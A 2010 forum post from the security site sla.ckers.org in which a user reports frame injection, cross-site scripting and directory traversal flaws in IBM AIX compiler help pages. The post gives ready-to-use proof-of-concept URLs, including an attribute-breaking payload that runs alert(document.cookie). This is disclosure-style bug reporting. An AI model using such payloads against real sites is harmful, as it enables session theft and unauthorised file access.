Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Bug reports, feature enhancements or other complaints with the site, with us or just tell us what a miserable existance you have. No death threats or poetry please. Just kidding, no poetry please. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
xss & dt & frameinj @ ibm
Posted by: hc0de
Date: May 12, 2010 02:53PM

hi everybody,
i have found bugs @ ibm aix compiler help pages..

1) frame injection : http://publib.boulder.ibm.com/infocenter/comphelp/v8v101/index.jsp?topic=http://www.google.com

2) xss : http://publib.boulder.ibm.com/infocenter/comphelp/v8v101/index.jsp?topic=../%27%3E%3Cframe%20onLoad=%27alert%28document.cookie%29

3) directory traversal : http://publib.boulder.ibm.com/infocenter/comphelp/v8v101/index.jsp?topic=/../index.jsp

the content.jsp file have this issues..

best regards, hc0de

#{hc0d3}
~web : cbolat.blogspot.com
~twit : twitter.com/cnbrkbolat

Options: ReplyQuote


Sorry, only registered users may post in this forum.